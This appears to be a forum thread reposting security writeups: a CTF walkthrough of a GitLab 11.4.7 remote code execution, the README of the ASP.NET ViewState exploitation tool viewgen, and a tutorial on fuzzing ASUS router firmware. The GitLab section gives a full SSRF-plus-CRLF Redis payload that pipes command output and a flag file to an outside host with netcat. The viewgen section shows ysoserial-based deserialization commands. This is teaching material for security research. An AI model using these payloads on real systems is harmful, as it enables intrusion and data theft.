    Huge shoutout to jcmturner for his pure Go implemntation of KRB5: https://github.com/jcmturner/gokrb5 . An amazing project and very well documented. Couldn't have done any of this without that project.

     

    Sursa: https://github.com/ropnop/kerbrute

  21. GitLab 11.4.7 Remote Code Execution

    21 Apr 2019

    TL;DR

    SSRF targeting redis for RCE via IPv6/IPv4 address embedding chained with CLRF injection in the git:// protocol.

    Video

    watch on YouTube

    Introduction

    At the Real World CTF, we came across an interesting web challenge called flaglab. The description said:

    "You might need a 0day"

    there was a link to the challenge, and there was a download link for a docker-compose.yml file. Upon visiting the challenge site, we are greeted by a GitLab instance. The docker-compose.yml file can be used to set up a local version of this very instance. Inside the docker-compose.yml, the docker image is set to gitlab/gitlab-ce:11.4.7-ce.0. Upon doing a google search on the gitlab version, we stumbled upon a blog post on GitLab Patch Release, and it seemed like it was the latest version - the blog post was created on Nov 21, 2018 and the CTF was happening on Dec 1, 2018. So we thought we would never find an 0day in GitLab due to its huge codebase and it's just a waste of time...

    But as it turns out, we were wrong on these assumptions. During a post CTF dinner with other teams, some people from RPISEC told us that it was not the latest version - there was a newer version 11.4.8 and the commit history of the newer version reveals several security patches. One of the bugs was a "SSRF in Webhooks" and it was reported by nyangawa of Chaitin Tech (which is also the company that organized the Real World CTF). Knowing all this, it was aactually a fairly simple challenge, and I was mad because we gave up without doing enough research. So after the event, I tried to solve this challenge from the knowledge gained so far.

    Setup

    Let's start setting up a local copy of the vulnerable version of GitLab. We can start by looking at the docker-compose.yml file.

    web:
      image: 'gitlab/gitlab-ce:11.4.7-ce.0'
      restart: always
      hostname: 'gitlab.example.com'
      environment:
        GITLAB_OMNIBUS_CONFIG: |
          external_url 'http://gitlab.example.com'
          redis['bind']='127.0.0.1'
          redis['port']=6379
          gitlab_rails['initial_root_password']=File.read('/steg0_initial_root_password')
      ports:
        - '5080:80'
        - '50443:443'
        - '5022:22'
      volumes:
        - './srv/gitlab/config:/etc/gitlab'
        - './srv/gitlab/logs:/var/log/gitlab'
        - './srv/gitlab/data:/var/opt/gitlab'
        - './steg0_initial_root_password:/steg0_initial_root_password'
        - './flag:/flag:ro'
    

    From the above YAML file, the following conclusions can be made:

    • The docker image used is GitLab Community Edition 11.4.7 gitlab-ce:11.4.7-ce.0.
    • Redis server runs on port 6379 and it is listening to localhost.
    • The rails initial_root_password is set using a file called steg0_initial_root_password
    • There are some ports mapped from the docker container to our machine, which exposes the application outside the container for us to fiddle with. We'll be using the HTTP service running on port 5080.
    • Additionally, there are volumes, which mounts the local files and folders inside the docker container. For example, ./srv/gitlab/logs on our machine will be mounted to /var/log/gitlab inside the docker container. The password file and the flag is also copied into the container.

    You can create these required files and folders using the following commands:

    # Create required folders for the gitlab logs, data and configs. leave it empty
    mkdir -p ./srv/gitlab/config ./srv/gitlab/data ./srv/gitlab/logs
    
    # Create a random password using python
    python3 -c "import secrets; print(secrets.token_urlsafe(16))" > ./steg0_initial_root_password
    # ==OR==
    # Choose your own password
    echo "my_sup3r_s3cr3t_p455w0rd_4ef5a2e1" > ./steg0_initial_root_password
    
    # Create a test flag
    echo "RWCTF{this_is_flaglab_flag}" > ./flag
    

    Now that we have the required files and folders, we can start the docker container using the following command.

    $ docker-compose up
    

    The process of downloading the base image and building the gitlab instance might take a few minutes. After you start seeing some logs, you should be able to browse to http://127.0.0.1:5080/ for the vulnerable GitLab version.

    Now it's time to configure the chrome browser to use a proxy. You can do it manually by going to the settings and changing it there, or you can do it via the command-line which is a bit handier.

    /path/to/chrome --proxy-server="127.0.0.1:8080" --profile-directory=Proxy --proxy-bypass-list=""
    

    I had problems with the Burp Suite proxy not being able to intercept the localhost requests even with the bypass list being empty. So a quick workaround was to add an entry in the hosts file like the following.

    127.0.0.1     localhost.com
    

    Browsing to http://localhost.com:5080 now lets us access GitLab through the Burp Suite proxy. That's all for the setup!

    The Bugs

    As you already know, we thought that 11.4.7 was the latest version of GitLab at that time, but in fact, there was a newer version 11.4.8 which had many security patches in the commits. One of the bugs was related to SSRF and it even referenced to Chaitin Tech, which is the company responsible for hosting the Real World CTF. Additionally we also know that the flag file is located in the /(root of the file system), so we need an Arbitrary File Read or a Remote Code Execution vulnerability. Now let's have a look at those patches for SSRF and other potential bugs. At the top, you'll find 3 security related commits.

    Cover Image

    There's our SSRF in Webhooks, we also have an XSS, but it's rather not that interesting for us, and finally, we have a CRLF injection (Carriage-Return/Line-Feed) which is basically newline injections. If we look at the fix for the SSRF issue and scroll down a bit, you'll see that there are unit tests to confirm the fix for the issue. These tests tell us how to exploit the bug, which is exactly what we wanted. Looking at some test cases, apparently, special IPv6 addresses which have an IPv4 address embedded inside them can bypass the SSRF checks.

    # SSRF protection Bypass
    https://[0:0:0:0:0:ffff:127.0.0.1]
    

    The other issue was a CRLF vulnerability in Project hooks, scrolling down to test cases you can see it's merely URLs with newlines. Either it's URL encoded, or simply they are just regular newlines. Now the question is, can these bugs help us in exploiting GitLab to get the flag? Yes, they can. By chaining these 2 bugs, we can get a Remote Code Execution. It's actually a typical security issue. Basically, an SSRF or Server Side Request Forgery is used to target the local internal Redis database, which is used extensively for different types of workers. So if you can push a malicious worker, you might end up with a Remote Code Execution vulnerability. In fact, GitLab has been exploited like this several times before, and there are many bug bounty writeups which are similar to this. I don't remember where I first came acorss this technique, but I believe it's @Agarri_FR back in 2015, tweeted about this and also there was a blog post by him from 2014. I did come across many bug  bug bounty writeups, so everyone who's into web security should know about this.

    Exploitation

    Now onto the fun stuff, first, let's see if we can trigger an SSRF somewhere. At first, I thought about targeting the Webhooks (used to send requests to a URL whenever any events are fired in the repository) like it's mentioned here. However, when I clicked on the create a new project, I saw multiple ways to import a project and one of them was Repo by URL, which would basically fetch the repo when you specify a URL. We can import a repo over http://, https:// and git://. So to test this, we can try to import the repo using the following URL.

    http://127.0.0.1/test/somerepo.git
    
    ssrf_test_one_fail.gif

    But we'd get the error that "Import URL is blocked: Requests to localhost are not allowed".

    Now, we can try the bypass using the special IPv6 address. So if we replace the import URL to the following.

    http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git
    

    Before importing using this URL, we need a server to listen on port 1234 to confirm the SSRF. To do that, we can get a root shell on the docker container to install netcat and then listen on port 1234 to see if the SSRF is triggered. First, let's go ahead and list out all the running Docker containers to know which one to get a shell on.

    # get a list of running docker containers
    $ docker ps
    CONTAINER ID    IMAGE                           COMMAND    CREATED    STATUS    NAMES
    bd9daf8c07a6    gitlab/gitlab-ce:11.4.7-ce.0      ...        ...        ...      ...
    

    We just have one running, and it's the GitLab 11.4.7. We can get a shell on the container using the following command by specifying a container ID.

    $ docker exec -i -t bd9daf8c07a6 "/bin/bash"
    

    Here,

    • bd9daf8c07a6 is the container ID.
    • -i means interaction with /bin/bash.
    • -t means create tty - a pseudo terminal for the interaction.

    Now that we have the shell, we can install netcat so that we can set up a simple server to listen for incoming SSRF requests.

    root@gitlab:~ apt update && apt install -y netcat
    

    Setting up a raw TCP server is simple as the following command.

    root@gitlab:~ nc -lvp 1234
    

    Here,

    • -l is to tell netcat that we have to "listen".
    • -v is for verbose output.
    • -p is to specift the port number on which the server has to bind on.

    Now that we have our SSRF testing setup done let's make the same import request to see if we can trigger the SSRF. Additionally, Instead of specifying the URL from the web application in the browser, we can use the Burp Suite's repeater to quickly modify the HTTP request to our needs and send it away. To do this, we can modify the old "Repo by URL" request. We can update the URL to http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git and the name of the project to something that isn't already there and send the request.

    Import using 127.0.0.1

    As you can see from the above image, we did get the request trapped in our netcat listener, and this confirms that there is SSRF which can talk to internal services, which in our case was the local netcat server on port 1234, which means that we can talk to the internal Redis server running on port 6379(specified in the docker-compose.yml).

    But what is Redis and how does GitLab use it?

    Redis is an in-memory data structure store, used as a database, cache and message broker. GitLab uses it in different ways like storing session data, caching and even background job queues. Redis uses a straightforward, plain text protocol, which means you can directly connect to Redis using netcat and start messing around.

    # quick test with redis
    root@gitlab:~ nc 127.0.0.1 6379
    
    blah
    - ERR unknown command 'blah'
    set liveoverflow test
    +OK
    asd
    - ERR unknown command 'asd'
    get liveoverflow
    $4
    test
    

    Redis is a simple ASCII text-based protocol, but HTTP is also a simple ASCII text-based protocol. Now, what would happen if we try to send the HTTP request to Redis? Would Redis execute commands? Let's try.

    # http request test with redis
    root@gitlab:~ nc 127.0.0.1 6379
    
    GET /test/ssrf.git/info/refs?service=git-upload-pack HTTP/1.1
    Host: [0:0:0:0:0:ffff:127.0.0.1]:1234
    User-Agent: git/2.18.1
    Accept: */*
    Accept-Encoding: deflate, gzip
    Pragma: no-cache
    - Err wrong number of arguments for 'get' command
    
    root@gitlab:~
    

    It gives us an error saying that there are wrong a number of arguments for the 'get' command which makes sense because from the earlier example, we know how 'get' command in Redis works. But, then we were dropped back to the shell, however from earlier, we saw that Redis doesn't quit even if there errors, so what is actually going on? Pasting the raw HTTP protocol data line by line gives us the answer. The second line Host: [0:0:0:0:0:ffff:127.0.0.1]:1234 is responsible for the Redis terminating the connection unexpectedly. This happens because SSRF to Redis is a huge issue and Redis has implemented a "fix" for this. If the string "Host:" is present to the Redis server as a command, it'll know that this is an HTTP request trying to smuggle some Redis commands and stops the execution by closing the connection.

    Only if we could get our payload in-between the first line(GET /test...) and the second(Host: ...), we can make this work. Since we control the first line of the HTTP request, can we inject some newlines and add more commands?

    *cough* CRLF *cough*

    Yes, remember the CRLF injection bug we saw in the Security Release and the commit history, we can use that! From the commit history's test cases, we can see that the injection is pretty straight forward. By merely adding newlines or URL encoding them would do the trick for example.

    http://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git
    
    # Expected to be Converted To 
    http://127.0.0.1:333/
    test
    blah.git
    

    However, this didn't work out. Not sure why this doesn't work, but by changing the protocol from http:// to git:// makes it work.

    # Does work :)
    git://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git
    
    # Expected to be Converted To 
    git://127.0.0.1:333/
    test
    blah.git
    

    Now that we know what Redis is, where it's being used and how we can add newlines using the CRLF injection, we can move on into creating a payload for the RCE. The idea is to talk to this internal Redis server by using the SSRF vulnerability and smuggling one protocol(Redis) in another(git://) and get the Remote Code Execution.

    Fortunately, @jobertabma has already figured out the payload. Let's have a look at it.

     multi
     sadd resque:gitlab:queues system_hook_push
     lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
     exec
    

    As you know, Redis can also be used to background job queues. These jobs are handled by Sidekiq, which is a background tasks processor for ruby. We can look at the list of sidekiq queues to see if there's anything that we can use.

      ...
      - [default, 1]
      - [pages, 1]
      - [system_hook_push, 1]
      - [propagate_service_template, 1]
      - [background_migration, 1]
      ...
    

    There's system_hook_push which can be used to handle the new jobs and it's the same one which is being used in the actual payload. Now to execute code/command, we need a class that would do it for us, think of this as a gadget. Fortunately, Jobert has also found the right class - gitlab_shell_worker.rb.

    class GitlabShellWorker
      include ApplicationWorker
      include Gitlab::ShellAdapter
    
      def perform(action, *arg)
        gitlab_shell.__send__(action, *arg) # rubocop:disable GitlabSecurity/PublicSend
      end
    end
    

    As you can see, this is exactly the class we've been looking for. Now this GitlabShellWorker is called with some arguments like class_eval and the actual command which needs to be executed, and in our case, it's the following.

    open('| COMMAND_TO_BE_EXECUTED').read
    

    In the actual payload, we push the queue onto system_hook_push and get the GitlabShellWorker class to run our commands.

    Now that we have everything we need for the exploitation, we can craft the final payload and send it over. Before doing that, I need to set up a netcat listener on our main machine (192.168.178.21) to receive the flag.

    $ nc -lvp 1234
    

    The final payload looks like the following.

     multi
     sadd resque:gitlab:queues system_hook_push
     lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'| cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
     exec
     exec
    

    Some points to note:

    • In the payload above, redis commands need to have a whitespace before it in every line - no clue why.
    • cat /flag | nc 192.168.178.21 1234 - we are reading the flag and sending it over to our netcat listener.
    • Added an extra exec command just so that the first one is executed properly and the second one would be concatenated with the next line instead of the first line. This is done so that important part of the payload won't break.

    The final import URL with the payload looks like this:

    # No Encoding
    git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
     multi
     sadd resque:gitlab:queues system_hook_push
     lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
     exec
     exec
    /ssrf.git 
    
    # URL encoded
    git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20192%2E168%2E178%2E21%201234%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf.git
    

    Now if you send the "Repo by URL" request with this URL, we get the flag!

    Final SSRF

    Conclusion and Takeaways

    This was a simple challenge, and after hearing about a newer version from the RPISEC team, and after seeing one of the reported bugs was by Chaitin Tech (organizers), it was just a matter of 2-3 hours to solve this challenge.

    • Do proper research before jumping into conclusions.
    • It's all about the mindset.

    Resources

    •  
    •  
    •  
    •  

    LiveOverflow

    LiveOverflow (and PwnFunction)

    wannabe hacker...

     

    Sursa: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/

    • Thanks 1
  22. viewgen

    ASP.NET ViewState Generator

    viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files


    Requirements: Python 3

    Installation

    pip3 install --upgrade -r requirements.txt or ./install.sh


    Usage

    $ viewstate -h
    usage: viewgen [-h] [--webconfig WEBCONFIG] [-m MODIFIER] [-c COMMAND]
                   [--decode] [--guess] [--check] [--vkey VKEY] [--valg VALG]
                   [--dkey DKEY] [--dalg DALG] [-e]
                   [payload]
    
    viewgen is a ViewState tool capable of generating both signed and encrypted
    payloads with leaked validation keys or web.config files
    
    positional arguments:
      payload               ViewState payload (base 64 encoded)
    
    optional arguments:
      -h, --help            show this help message and exit
      --webconfig WEBCONFIG
                            automatically load keys and algorithms from a
                            web.config file
      -m MODIFIER, --modifier MODIFIER
                            VIEWSTATEGENERATOR value
      -c COMMAND, --command COMMAND
                            Command to execute
      --decode              decode a ViewState payload
      --guess               guess signature and encryption mode for a given
                            payload
      --check               check if modifier and keys are correct for a given
                            payload
      --vkey VKEY           validation key
      --valg VALG           validation algorithm
      --dkey DKEY           decryption key
      --dalg DALG           decryption algorithm
      -e, --encrypted       ViewState is encrypted

    Examples

    $ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
    [+] ViewState
    (('1628925133', (None, [3, (['enctype', 'multipart/form-data'], None)])), None)
    [+] Signature
    7441f6eeb4fab5a5f30d6ba99908c08eb683b9e6
    [+] Signature match
    
    $ viewgen --webconfig web.config --modifier CA0B0334 "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk"
    r4zCP5CdSo5R9XmiEXvp1LHVzX1uICmY7oW2WD/gKS/Mt/s+NKXrMpScr4Gvrji7lFdHPOttFpi2x7YbmQjEjJ2NdBMuzeKFzIuno2DenYF8yVVKx5+LL7LYmI0CVcNQ+jH8VxvzVG58NQIJ/rSr6NqNMBahrVfAyVPgdL4Eke3Bq4XWk6BYW2Bht6ykSHF9szT8tG6KUKwf+T94hFUFNIXXkURptwQJEC/5AMkFXMU0VXDa
    
    $ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI="
    [+] ViewState is not encrypted
    [+] Signature algorithm: SHA1
    
    $ viewgen --guess "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
    [!] ViewState is encrypted
    [+] Algorithm candidates:
    AES SHA1
    DES/3DES SHA1

    Achieving Remote Code Execution

    Leaking the web.config file or validation keys from ASP.NET apps results in RCE via ObjectStateFormatter deserialization if ViewStates are used.

    You can use the built-in command option (ysoserial.net based) to generate a payload:

    $ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld"

    However, you can also generate it manually:

    1 - Generate a payload with ysoserial.net:

    > ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "ping yourdomain.tld"

    2 - Grab a modifier (__VIEWSTATEGENERATOR value) from a given endpoint of the webapp

    3 - Generate the signed/encrypted payload:

    $ viewgen --webconfig web.config --modifier MODIFIER PAYLOAD

    4 - Send a POST request with the generated ViewState to the same endpoint

    5 - Profit 🎉🎉


    Thanks


    CTF Writeups about this technique

    Talks about this technique

     

    Sursa: https://github.com/0xACB/viewgen

  23. Modern Vulnerability Research Techniques on Embedded Systems

     
     

    This guide takes a look at vetting an embedded system (An ASUS RT-AC51U) using AFL, angr, a cross compiler, and some binary instrumentation without access to the physical device. We'll go from static firmware to thousands of executions per second of fuzzing on emulated code. (Sorry no 0days in this post)

    Asus is kind enough to provide the firmware for their devices online. Their firmware is generally a root file system packed into a single file using squashfs. As shown below, binwalk can run through this file system and identify the filesystem for us.

     
    
     
    $ binwalk RT-AC51U_3.0.0.4_380_8457-g43a391a.trx
    DECIMAL HEXADECIMAL DESCRIPTION
    --------------------------------------------------------------------------------
    64 0x40 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 3551984 bytes
    1174784 0x11ED00 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 13158586 bytes, 1492 inodes, blocksize: 131072 bytes, created: 2019-01-09 11:06:39

    Binwalk supports carving the filesystem out of the firmware image through the -Mre flags and will put the resulting root file system into a folder titled squash-fs

     
    
     
    $ ls
    40 _40.extracted squashfs-root
    $ ls squashfs-root/
    asus_jffs cifs2 etc_ro lib opt rom sys usr
    bin dev home mmc proc root sysroot var
    cifs1 etc jffs mnt ra_SKU sbin tmp www

     

    Motivation

    The LD_PRELOAD trick is a method of hooking symbols in a given binary to call your symbol, which the loader and placed before the reference to the original symbol. This can be used to hook function, like malloc and free in the case of libraries like libdheap, to call your own code and perform logging or other intrumentation based analysis. The general format requires compiling a small stub of c code and then running your binary like this:

     
    
     
    LD_PRELOAD=/Path/To/My/Library.so ./Run_Binary_As_Normal

    I wanted to try a trick I saw online to create a fast and effective fuzzer for network protocol fuzzing. This github gist shows a PoC of creating an LD_PRELOAD'd library that intercepts libc's call to main and replaces it with our own.

     
    
     
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <dlfcn.h>
    /* Trampoline for the real main() */
    static int (*main_orig)(int, char **, char **);
    /* Our fake main() that gets called by __libc_start_main() */
    int main_hook(int argc, char **argv, char **envp)
    {
    // Do my stuff
    }
    /*
    * Wrapper for __libc_start_main() that replaces the real main
    * function with our hooked version.
    */
    int __libc_start_main(int (*main)(int, char **, char **), int argc, char **argv,
    int (*init)(int, char **, char **),
    void (*fini)(void),
    void (*rtld_fini)(void),
    void *stack_end)
    {
    /* Save the real main function address */
    main_orig = main;
    /* Find the real __libc_start_main()... */
    typeof(&__libc_start_main) orig = dlsym(RTLD_NEXT, "__libc_start_main");
    /* ... and call it with our custom main function */
    return orig(main_hook, argc, argv, init, fini, rtld_fini, stack_end);
    }

    My thought was to then call a function inside of the now loaded binary starting from main. Any following calls or symbol look ups from the directly called function should resolve correctly because the main binary is loaded into memory!

    Defining a function prototype and then calling a function seemed to work. I can pull a function address out of a binary and jump to it with arbitrary arguments and the compiler abi will place to arguments into the runtime correctly to call the function. :

     
    
     
    /* Our fake main() that gets called by __libc_start_main() */
    int main_hook(int argc, char **argv, char **envp)
    {
    char user_buf[512] = {"\x00"};
    read(0, user_buf, 512);
    int (*do_thing_ptr)() = 0x401f30;
    int ret_val = (*do_thing_ptr)(user_buf, 0, 0);
    printf("Ret val %d\n",ret_val);
    return 0;
    }

    This process is very manual and slow... Let's speed it up!

     

    Setting up

    The extracted firmware executables are all mips little endian based and are interpreted through uClibc.

     
    
     
    $ file bin/busybox
    bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-, stripped
    $ ls lib/
    ld-uClibc.so.0 libdl.so.0 libnsl.so.0 libws.so
    libcrypt.so.0 libgcc_s.so.1 libpthread.so.0 modules
    libc.so.0 libiw.so.29 librt.so.0
    libdisk.so libm.so.0 libstdc++.so.6

    DockCross does not support uClibc cross compiling yet so I needed to build my own cross compilers. Using buildroot I created a uClibc cross compiler for my Ubuntu 18.04 machine. To save time in the future I've posted this toolchain and a couple others online here. This toolchain enables quick cross compiling of our LD_PRELOADed libraries.

    The target is the asusdiscovery service. There has already been a CVE for it and it proves to be hard to fuzz manually. The discovery service periodically sends packets out across the network, scanning for other ASUS routers. When another ASUS router sees this discover packet, it responds with it's information and the discovery service parses it.

    These response-based network services can be hard to fuzz through traditional network fuzzing tools like BooFuzz. So we're going to find where it parses the response and fuzz that logic directly with our new-found LD_PRELOAD tricks.

    Pulling symbol information from this binary yields a quick tell to which function does the parsing ParseASUSDiscoveryPackage:

     
    
     
    $ readelf -s usr/sbin/asusdiscovery
    Symbol table '.dynsym' contains 85 entries:
    Num: Value Size Type Bind Vis Ndx Name
    0: 00000000 0 NOTYPE LOCAL DEFAULT UND
    1: 0040128c 236 FUNC GLOBAL DEFAULT 10 safe_fread
    2: 00414020 0 NOTYPE GLOBAL DEFAULT 18 _fdata
    3: 00000001 0 SECTION GLOBAL DEFAULT ABS _DYNAMIC_LINKING
    4: 0041c050 0 NOTYPE GLOBAL DEFAULT ABS _gp
    ..............SNIP....................
    33: 004141b0 4 OBJECT GLOBAL DEFAULT 22 a_bEndApp
    34: 00402cec 328 FUNC GLOBAL DEFAULT 10 ParseASUSDiscoveryPackage
    35: 00403860 0 FUNC GLOBAL DEFAULT UND sprintf
    ...............SNIP.....................

    With this symbol in mind we can open the binary up in Ghidra and have the decompiler give us a rough idea of how it's working:

     
    
     
    undefined4 ParseASUSDiscoveryPackage(int iParm1)
    {
    ssize_t sVar1;
    socklen_t local_228;
    undefined4 local_224;
    undefined4 local_220;
    undefined4 local_21c;
    undefined4 local_218;
    undefined auStack532 [516];
     
    myAsusDiscoveryDebugPrint("----------ParseASUSDiscoveryPackage Start----------");
    if (a_bEndApp != 0) {
    myAsusDiscoveryDebugPrint("a_bEndApp = true");
    return 0;
    }
    local_228 = 0x10;
    memset(auStack532,0,0x200);
    sVar1 = recvfrom(iParm1,auStack532,0x200,0,(sockaddr *)&local_224,&local_228);
    if (0 < sVar1) {
    PROCESS_UNPACK_GET_INFO(auStack532,local_224,local_220,local_21c,local_218);
    return 1;
    }
    myAsusDiscoveryDebugPrint("recvfrom function failed");
    return 0;
    }

    The function appears to be instantiating a 512 byte buffer and reading from a given network file descriptor through the recvfrom function. A quick visit to recvfrom's manpage reveals that the second argument going into recvfrom will contain the network input, the input we can control.

     
    
     
    RECV(2) Linux Programmer's Manual RECV(2)
    NAME
    recv, recvfrom, recvmsg - receive a message from a socket
    SYNOPSIS
    #include <sys/types.h>
    #include <sys/socket.h>
    ssize_t recv(int sockfd, void *buf, size_t len, int flags);
    ssize_t recvfrom(int sockfd, void *buf, size_t len, int flags,
    struct sockaddr *src_addr, socklen_t *addrlen);

    This user input is immediately passed to the PROCESS_UNPACK_GET_INFO function. This function in responsible for parsing the user input and relaying that information to the router.

    Opening the function in ghidra reveals a large parsing function. This looks perfect for fuzzing!

    aa

    assets%2F-LWRAm7V9PvgumFt5f6A%2F-LcdTIUXXqqykIw9OGGy%2F-LcdTLzPFWcbJOTOkDHO%2FPROCESS_UNPACK_GET_INFO.png?alt=media&token=f67f3b73-ffb4-4fd5-91de-2a75ed29444b
     

    The next step is interacting with the function and providing input into that first argument. The first step towards running this as an independent function is recovering the function prototype. Ghidra shows the defined function prototype as below.

     
    
     
    void PROCESS_UNPACK_GET_INFO(char *pcParm1,undefined4 uParm2,in_addr iParm3)

    Using stub-builder you can take this information

     

    Instrumenting asusdiscover

    Similarly to the PoC of the LD_PRELOAD main hook shown above, I needed to hook the main function. For uClibc that function is __uClibc_main. Using the same trick as above, we'll define a function prototype for the function we want to call, then hook uClibc's main function and then jump directly to the function we want to call with our arguments.

    To make this process easier, I created a tool to identify function prototypes and slot them into templated c code. The current iteration of stub-builder will accept a file and a given function to instrument. The tool is imperfect and will use radare2 to identify (often wrongly) function prototypes and place them into the c stub.

     
    
     
    $ stub_builder -h
    usage: stub_builder [-h] --File FILE {hardcode,recover} ...
    positional arguments:
    {hardcode,recover} Hardcode or automatically use prototypes and addresses
    hardcode Use absolute offsets and prototypes
    recover Use radare2 to recover function address and prototype
    optional arguments:
    -h, --help show this help message and exit
    --File FILE, -F FILE ELF executable to create stub from

    An example for the command can be seen below. The stub builder uses radare2 for it's function recovery and fails to identify the first argument as a char* so we need to fixup the main_hook.c.

     
    
     
    $ stub_builder -F usr/sbin/asusdiscovery recover name PROCESS_UNPACK_GET_INFO
    [+] Modify main_hook.c to call instrumented function
    [+] Compile with "gcc main_hook.c -o main_hook.so -fPIC -shared -ldl"
    [+] Hook with: LD_PRELOAD=./main_hook.so ./usr/sbin/asusdiscovery
    [+] Created main_hook.c

    Hardcoded values can be inserted instead. The below command supplies the address, argument prototype and the expected return type:

     
    
     
    $ stub_builder -F usr/sbin/asusdiscovery hardcode 0x00401f30 "(char *, int, int)" "int"
     
    
     
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <dlfcn.h>
    //gcc main_hook.c -o main_hook.so -fPIC -shared -ldl
    /* Trampoline for the real main() */
    static int (*main_orig)(int, char **, char **);
    /* Our fake main() that gets called by __libc_start_main() */
    int main_hook(int argc, char **argv, char **envp)
    {
    //<arg declarations here>
    char user_buf[512] = {"\x00"};
    //scanf("%512s", user_buf);
    read(0, user_buf, 512);
    int (*do_thing_ptr)(char *, int, int) = 0x401f30;
    int ret_val = (*do_thing_ptr)(user_buf, 0, 0);
    printf("Ret val %d\n",ret_val);
    return 0;
    }
    //uClibc_main
    /*
    * Wrapper for __libc_start_main() that replaces the real main
    * function with our hooked version.
    */
    int __uClibc_main(
    int (*main)(int, char **, char **),
    int argc,
    char **argv,
    int (*init)(int, char **, char **),
    void (*fini)(void),
    void (*rtld_fini)(void),
    void *stack_end)
    {
    /* Save the real main function address */
    main_orig = main;
    /* Find the real __libc_start_main()... */
    typeof(&__uClibc_main) orig = dlsym(RTLD_NEXT, "__uClibc_main");
    /* ... and call it with our custom main function */
    return orig(main_hook, argc, argv, init, fini, rtld_fini, stack_end);
    }

    The code above will accept input from STDIN and pass it into the parsing function directly. This enable us to test and get return values of the functions without any networking compoonents required.

     

    Running the code

    Cross compiling the shared object using the provided cross compilers is shown below. The resulting file will be named main_hook.so

     
    
     
    t$ /opt/cross-compile/mipsel-linux-uclibc/bin/mipsel-buildroot-linux-uclibc-gcc main_hook.c -o main_hook.so -fPIC -shared -ldl

    Using this library is shown below and with my toolchain it doesn't link the libdl library and will result in the error below:

     
    
     
    $ qemu-mipsel -L /home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root -E LD_PRELOAD=/main_hook.so ./usr/sbin/asusdiscovery
    ./usr/sbin/asusdiscovery: can't resolve symbol 'dlsym'

    Adding the libdl library to the LD_PRELOAD fixes this problem and resolves the dlsym function.

     
    
     
    $ qemu-mipsel -L /home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root -E LD_PRELOAD=/lib/libdl.so.0:/main_hook.so ./usr/sbin/asusdiscovery
    abcd
    Ret val 4

    We now have the binary running and it's accepting our input and passing it directly to the function. The next stage is generating a set of valid input data to seed our fuzzer with.

     

    Generating valid input for a test corpus

    Sending in random strings of "A"s will not yield new discovered paths through the parsing function. Looking at the function decompilation we can see there is a quick check performed in a funciton titled UnpackGetInfo_NEW . This is the first function we need to look at, to determine if there are any early exits from initial parses.

     
    
     
    memset(&local_320,0,0xf8);
    memset(&uStack1000,0,200);
    iVar28 = UnpackGetInfo_NEW(pcParm1,&local_320,&uStack1000);
